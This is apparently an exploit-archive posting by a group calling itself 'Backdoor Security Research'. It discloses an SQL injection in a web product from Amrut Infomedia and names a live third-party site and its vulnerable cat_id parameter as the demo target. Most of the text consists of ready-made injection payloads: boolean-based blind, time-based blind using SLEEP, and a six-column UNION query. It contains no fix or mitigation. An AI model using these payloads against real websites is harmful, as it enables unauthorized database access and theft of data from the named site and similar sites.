---------------------------------------------------------
# Exploit Title: Created by Amrut Infomedia Ltd. - SQL Injection
# Google Dork: N/A
# Date: 2020-11-17
# Exploit Author: Backdoor Security Research
# Contact us : btm@tutanota.de
# Vendor Homepage: http://www.phoenixweb.in/
# Software Link: http://www.phoenixweb.in/
# Version: -
# Tested on: Ubuntu
# CVE : N/A
---------------------------------------------------------
Demo:
http://www.classygroup.in/products-listing-detail.php?cat_id=1&p_id=8[SQL Injection]
Parameter: cat_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=1' AND 4456=4456 AND 'LlvY'='LlvY&p_id=8
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat_id=1' AND (SELECT 1458 FROM (SELECT(SLEEP(5)))FFwB) AND 'Thpb'=
'Thpb&p_id=8
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: cat_id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178767671,
0x53665a61427267746d4e72624d737a5a6552736e7176677a6a4661486944694963524e70715678
6a,0x71766b7071),NULL-- -&p_id=8
----------------------------------------------------------
# Discovred : Unkn0wn (0x9a@tutanota.com)
# Visit: https://t.me/BackdoorTm
#
# "Backdoor Security Research" Part of " Backdoor Team "
# https://cxsecurity.com/issue/WLB-2020110118
